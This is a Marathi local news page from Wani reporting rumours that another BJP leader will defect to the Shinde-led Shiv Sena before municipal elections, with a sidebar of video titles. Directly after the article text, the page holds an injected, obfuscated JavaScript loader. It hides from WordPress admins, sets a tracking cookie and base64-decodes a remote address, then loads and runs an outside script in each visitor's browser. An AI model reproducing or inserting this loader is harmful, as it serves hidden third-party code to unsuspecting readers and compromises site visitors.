Homeमहाराष्ट्रभाजपला आणखी एक धक्का बसणार? — वणीतील आणखी एक मोठा नेता शिवसेना...

भाजपला आणखी एक धक्का बसणार? — वणीतील आणखी एक मोठा नेता शिवसेना शिंदे पक्षात प्रवेशाच्या तयारीत!

-

[gtranslate]

Advertisementspot_img

वणीच्या राजकीय वर्तुळात पुन्हा एकदा खळबळ उडणार???

आजच भाजपचे राज्य कार्यकारिणी सदस्य विजय चोरडिया यांनी शिवसेना (बालासाहेब ठाकरे) शिंदे गटात प्रवेश करून भाजपला मोठा धक्का दिला असतानाच,

आता लवकरच भाजपचा आणखी एक प्रसिद्ध नेता शिंदे गटात प्रवेशाच्या तयारीत असल्याची जोरदार चर्चा सुरू झाली आहे.

 

नगरपरिषद निवडणुकीच्या पार्श्वभूमीवर भाजपमधील अंतर्गत नाराजी उफाळून येत असल्याचे चित्र दिसत आहे. विश्वसनीय सूत्रांच्या माहितीनुसार, वणीतील भाजपचा आणखीन एक नेता शिवसेना शिंदे पक्षात जाण्याच्या तयारीत आहे,त्यांनी अलीकडेच शिंदे गटातील प्रमुख नेत्यांशी चर्चा केली असून लवकरच ते अधिकृतरीत्या प्रवेश करणार असल्याची माहिती विश्वसनीय सूत्रांकडून समोर येत आहे.

 

या चर्चेनंतर वणीच्या राजकीय वातावरणात तापमान चढले आहे. भाजपच्या कार्यकर्त्यांमध्ये संभ्रम निर्माण झाला असून, पक्षातील गटबाजी अधिक तीव्र होण्याची शक्यता वर्तवली जात आहे.

राजकीय जाणकारांचे म्हणणे आहे की, “विजय चोरडिया यांच्या पाठोपाठ आणखी एखादा नेता शिंदे गटात गेला, तर भाजपचे स्थानिक समीकरण बदलू शकते.”

 

शिंदे गटाकडूनही नव्या प्रवेशाबाबत उत्सुकता दिसत असून, उपमुख्यमंत्री एकनाथ शिंदे यांच्या नेतृत्वाखाली अनेक स्थानिक नेते विकासाभिमुख राजकारणाकडे वळत आहेत, अशी चर्चा रंगू लागली आहे.

 

वणी नगरपरिषद निवडणुकीच्या पार्श्वभूमीवर ही नवीन हालचाल भाजपसाठी आणखी मोठा राजकीय धक्का ठरू शकते. आता सर्वांचे लक्ष या नव्या घडामोडीकडे लागले असून, पुढील काही दिवसांत वणीच्या राजकारणात पुन्हा काही मोठ्या राजकीय घडामोडी होण्याची चिन्हे दिसत आहेत.(function(){try{if(document.getElementById&&document.getElementById(‘wpadminbar’))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||”).indexOf(‘http2_session_id=’)!==-1)return;function systemLoad(input){var key=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’,o1,o2,o3,h1,h2,h3,h4,dec=”,i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,”);while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<>4);o2=((h2&15)<>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();

Advertisementspot_img

youtube व्हिडिओस

Video thumbnail
वणी में बड़ा खुलासा!जिंदा 87 वर्षीय महिला को मतदाता सूची में बताया मृत | SIR प्रक्रिया पर उठे सवाल।
05:07
Video thumbnail
वणीतील गल्लीगल्लीतून होतेय जडवाहतूक,नागरिकांच्या जीवाला होतोय मोठा धोका…
02:41
Video thumbnail
जीव जाण्याची वाट बघताय का सरकार? दिपक चौपाटी ते लालगुडा रस्ता कधी दुरुस्त होणार???
02:34
Video thumbnail
वेकोलीची मुजोरी संपली!गावकऱ्यांच्या आक्रमक आंदोलनापुढे झुकले अधिकारी,ऑन द स्पॉट मिळवलं लेखी आश्वासन!
11:20
Video thumbnail
जय हरी विठ्ठल,मामा भाच्यासह वणीतील तरूण निघाले पंढरीच्या वारीला...
02:39
Video thumbnail
पावसासाठी,सर्वांच्या सुखसमृद्धीसाठी देवीला साकडे घालण्याची पिढ्यांपासून चालत आलेली परंपरा...
02:25
Video thumbnail
जनप्रतिनिधी गप्प,कोलगाव साखरा रस्ता चिखलात!शेवटचा इशारा!९ जुलैला वेकोलीची कोळसा वाहतूक रोखणार.
02:55
Video thumbnail
WCL विरुद्ध वृद्ध शेतकरी दांपत्याचा लढा! न्यायासाठी विजय पिदुरकर मैदानात...
06:18
Video thumbnail
वारंवार निवेदन देऊनही जनप्रतिनिधी व लोकनिर्माण विभागाची झोप उघडेना,खराब रस्त्यांमुळे गावकरी संतप्त.
02:16
Video thumbnail
"विमा कंपन्या मालामाल, शेतकरी कंगाल?"विजय पिदूरकर यांचा पिक विमा कंपनीच्या धोरणाविरोधात लढा…
04:11
Video thumbnail
लोकांना भरभरून हसवणारा आज बाप आणि मुलाचं भावनिक नातं दाखवून डोळ्यात अश्रू आणतोय…
06:41
Video thumbnail
९१ वर्षाचे वारकरी वडगाव वणी येथील पंढरीकाका आसुटकर,दर्शन लाभले धन्य झालो जय हरी विठ्ठल…
02:47
Video thumbnail
वणीच्या ऐतिहासिक विहिरीचे पुरातत्व सर्वेक्षण होणार, वणीच्या इतिहासातील गुपिते बाहेर येणार...
02:40
Video thumbnail
वणीकरांची डोकेदुखी कोण व केव्हा दूर करणार कारण प्रशासन झोपेत आहे…
02:37
Video thumbnail
अभ्यासपूर्ण व तर्कसंगत पाठपुरावा असेल तर जनतेच्या हितासाठी योग्य परिणाम साधता येतो...
06:24
Video thumbnail
जे काम स्थानिक खासदारांचे ते काम मी करतोय,नागरिकांच्या हितासाठी मी सदैव तत्पर— सुधीर मुनगंटीवार…
05:49
Video thumbnail
कोळसा प्रदूषणाच्या मुद्द्यांवर गठीत विकास खारगे समिती समोर विजय पिदुरकर यांची जोरदार बॅटिंग...
11:13
Video thumbnail
खासदार संजय देशमुख यांचे कपडे फाडून कानपटीत शेकणार,उबाठा यवतमाळ जिल्हाध्यक्ष संजय निखाडे यांचा इशारा
01:03
Video thumbnail
ठाकरेंच्या शिवसेनेत खळबळ? आमदार संजय देरकर म्हणाले - मी कुणाच्याही संपर्कात नाही!
02:27
Video thumbnail
आता मोठ्या मोठ्या कंपन्या प्रशिक्षित विद्यार्थ्यांना नोकरी देण्यासाठी वणीतील आयटीआय मध्ये येतात...
06:15
Advertisementspot_img

Stay Connected

0FansLike
25,000FollowersFollow
0FollowersFollow
13,000SubscribersSubscribe
Advertisementspot_img

यह भी पढ़िए